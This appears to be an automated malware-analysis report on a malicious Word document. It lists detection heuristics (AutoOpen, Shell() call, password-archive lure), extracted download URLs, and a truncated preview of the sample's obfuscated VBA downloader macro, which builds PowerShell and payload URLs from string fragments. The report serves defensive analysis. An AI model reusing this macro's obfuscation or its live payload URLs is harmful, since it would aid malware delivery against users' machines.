Malware Insights
The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within its VBA macros. The macro runs from an AutoOpen entry point, so it executes as soon as the document is opened. The script concatenates string fragments to assemble a URL, specifically 'demotas+t', which is likely used to download and execute a second-stage payload. The 'Password-protected archive handoff' heuristic further suggests that the document may be a lure to trick users into opening a password-protected archive, which often contains malware.
Heuristics (8)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high) [SE_PASSWORD_ARCHIVE_LURE]: Document gives password instructions for an archive or attachment, a technique often used to keep payloads encrypted until after gateway scanning
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://demotas+t (in document text, OLE body)
  - http://qch.ge/cx8yyu/,httwMf+wMfp://wMf+wMfwwwtas+tas.lisettas+Z5ZaN7Q26abHmjZj6373Z5 (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 877a2a63a80350bb37120c559e552d4652b34ac7271320e52dfe3f02dd953545) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 94041 bytes |
Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nMiGwQaoHIk"
Function mnrnpILAXQp()
JnzDDoB = ("SQvjvwoGF" + "ZtnYKloS" + "JXVaptfYUDuj" + "TWnQQBvHDJhM" + "KadNwNfKr" + "wqGqQXTDKaqZQk") + ("UmWiFNoOajFvGG" + "DZcbqZKLfjjG" + "lYkJsTbbIf" + "hIbfGLcMwiWR" + "ptUKbrvWHRcBzv" + "nfFutru")
TnDDRvJvVYG = ("mOzALft" + "SwuFThMFEQQQ" + "PAPtCOTwBczYY" + "uZiqIbfVjXMmir" + "QauzKXNkHJRZo" + "VuhvkRjaZ") + ("oNtRrjPf" + "HlBFbNZjoWh" + "CqENdirzZJpBm" + "zdwtatlz" + "fUpGhLlrDrPm" + "oDNBYiCzwA")
PtKcQ = Mid("O9zRMft'+'as+tas MCVtas+tas_.E'+'xcept'+'iiV0amIwK9", 5, 38)
NzwHjH = ("wiETGXKsPHnT" + "wRzRjPZrwiHPZZ" + "YbXGvLWfW" + "owzYNtMcDo" + "FdJbUrzAz" + "jwsTnjh") + ("ncmdtvQbSl" + "vnWkDTwNiaUW" + "ZTHAEEaJfDQ" + "bcjOLsYN" + "BRKNpAoWC" + "SFGEanPWNLaQjF")
ELHXK = ("bwEsQdmnSPwfmq" + "mOdAQONc" + "zNLFENnFo" + "CJLWGSB" + "rNjrzMpvOzpzjO" + "qvDSjiFbrq") + ("nzbsXhOTWOhF" + "zQIwqPoWn" + "UbDAUMlmpAPYp" + "WaHlMsFIpp" + "QaHlbBNAK" + "RTjtHkc")
iDdCNWNswka = ("crPwShvIQX" + "znPElnc" + "zGUXIbw" + "LColhFpNJZ" + "kPXwqjYqcH" + "ZnodISHT") + ("XWMkGbm" + "swCuLQrpaJ" + "qjlTOBcAwEw" + "FqTzODnqOu" + "wdFPOXw" + "iJdcWmCwidapQ")
tzPATIEn = Mid("U50Rlljt0vXS2SVwSPdrMwlRontas+t'+'as.Message;tas+tas}}ta'+'s)'+'.RepLAcEwMf+wMf(ta'+'s907tawcia8Ap", 25, 68)
zckBqTAK = ("FwaanbQHDKujM" + "NhEmiBNwCYiO" + "GbrFIdP" + "rrpmfUTwDFbu" + "FwpUFaiGvCv" + "VJjLFmFwBW") + ("OAwjuAzSDUaAc" + "kCCkdvo" + "MJLmmzTWzdjIaU" + "ukGwksFv" + "DJUjCLXa" + "UopVHNB")
BZAXAs = ("cziUVDJnZGUYm" + "kVwqiimJhw" + "AjbYzTW" + "wLioCLskkdV" + "OOQdRmSz" + "BSQjTVWhPam") + ("zqKFjwiqzBfLqm" + "QwHNAYwusOIj" + "VCUDjJQXFXkpo" + "izmEpjjF" + "INlZzvSrXNnV" + "jcchWOLaWXMRUu")
mziVtqII = ("hWwRUcPvIAXzEB" + "NBidcjT" + "GIHFjRZdsvlK" + "zrjjFnuLAbwS" + "bTYkYPNkpJMX" + "iiXiESqWNKww") + ("vZaFjKmwqG" + "IWWzwJi" + "JWJMoVXibK" + "IZnBToKjc" + "lkncTWh" + "tYDbbmAmNmkIjK")
cAaNzMj = Mid("IzO6f9wi9BvQz9zQrjas+tasMCVoCbMvb8NMKkz0fMUMi", 19, 9)
zokTbhnM = ("JTCHPTM" + "zkRcmfNcAljTK" + "IJVuIlpYHiA" + "iEKjFbUmi" + "FlZuIvMjlbujKs" + "UKaAYcmbZzJR") + ("fHwXwLEjVN" + "uMbtZSBtRuk" + "tmFTSKzzz" + "sAdcXiwoCzw" + "FMBtCGvQAZurFl" + "rmZVQdRUbPwvT")
iucSs = ("tfjWrzSzGZ" + "RdinYcKcFOwNc" + "pubuRRBXsj" + "ZEwGWFzzKafI" + "wBPCFHw" + "GCBFqDoIr") + ("lzFwXOWiIzQRsK" + "XzPBwSlkPTBu" + "jCLoThu" + "wziAjWzz" + "pJrTTFY" + "tbANqfVU")
JTrpcFSLq = ("dslTwjtSYIsBjc" + "FmXmpHBdi" + "TosaiFLcVWj" + "XIEzZORc" + "uoAVcYIdn" + "PHncsArtChY") + ("FmvPPiqhm" + "BQZArEBh" + "wiuRCjf" + "whUOvrji" + "aNJanFpDF" + "DsJnsUiZfK")
OCHKDbZGuz = Mid("cttp://luizmatas+tasss'+'oterapetas+taswM'+'f+wMfuta.tas+t'+'ascom.tas+tasbrtas+tas/tas+tasvtas+taZlhjwi6XhW0I1IuRls", 2, 97)
fLCpu = ("CFmbwLPaYA" + "BRvlkNdrChMz" + "haFuzIRIjLUt" + "aqwcsvEn" + "bjOccBd" + "opIAuXGVc") + ("jdUGbsYmn" + "aoRszbzZfVjPiP" + "ilMjTrGPfV" + "lUFWEpOk" + "zXQASYhqHjTzF" + "wGLGTBTYmWpq")
RobrHLiR = ("IwSwlzwzL" + "oFDhKWqU" + "ZzfvJciYzXC" + "ONuKszjil" + "hZMMPSRlZG" + "smSdDIUDYBcJua") + ("IXRYKqrERGizM" + "HLzwSVbch" + "pMbMUFPSmXJuU" + "vIBiAXU" + "HnRpiNbE" + "fpbjwPfkM")
ZtNMjO = ("TJQqAuXXGUM" + "uKQIwCKfl" + "PtjviXbl" + "LbuNjrsSFhMpmw" + "YqDQpUfKsLtXH" + "LAvVaBm") + ("zjQEjFw" + "TdurWrTKwZ" + "QBBmTkNtjQU" + "zFYtTzkk" + "MTrQcQjThk" + "BVWzvwzTWL")
QLRXrw = Mid("jiJGUZ31dVPuIVMOZL2-'+'con'+'tent/thtas'+'+tasemes/stas+tasctas+tashulerrozzi/vXltas+tas0'+'kcytas+9zzEdZ2Y", 20, 80)
wKoUohKDf = ("QKpGNrwAJUtcK" + "dEnviaCqiH" + "EsRwtWwnjEA" + "jDziMSjXD" + "GFubjFmnZci" + "JzfEPwupdRc") + ("HrjrqYwkaZmL" + "SmsBtiY" + "EuwDIDlcOBpc" + "TrYuzBiz" + "kMTBwLB" + "kmECCzhohVMHM")
zljHsVjw = ("jhSdTVwPL" + "UKdTfLz" + "VhSjiidzYho" + "lzfKVNlnX" + "CaTwSwNhs" + "tRTfAzwkzVw") + ("bwPUfTwSa" + "CIfsNmQf" + "qpNTUjAJVOBn" + "QnzVjzT" + "jZzhOKzImMTUlF" + "NfuofJdDZY")
FnzHJbWF = ("zivwuUGvdu" + "CKljGGaaaRCY" + "RuqGPjR" + "p
```
... (truncated)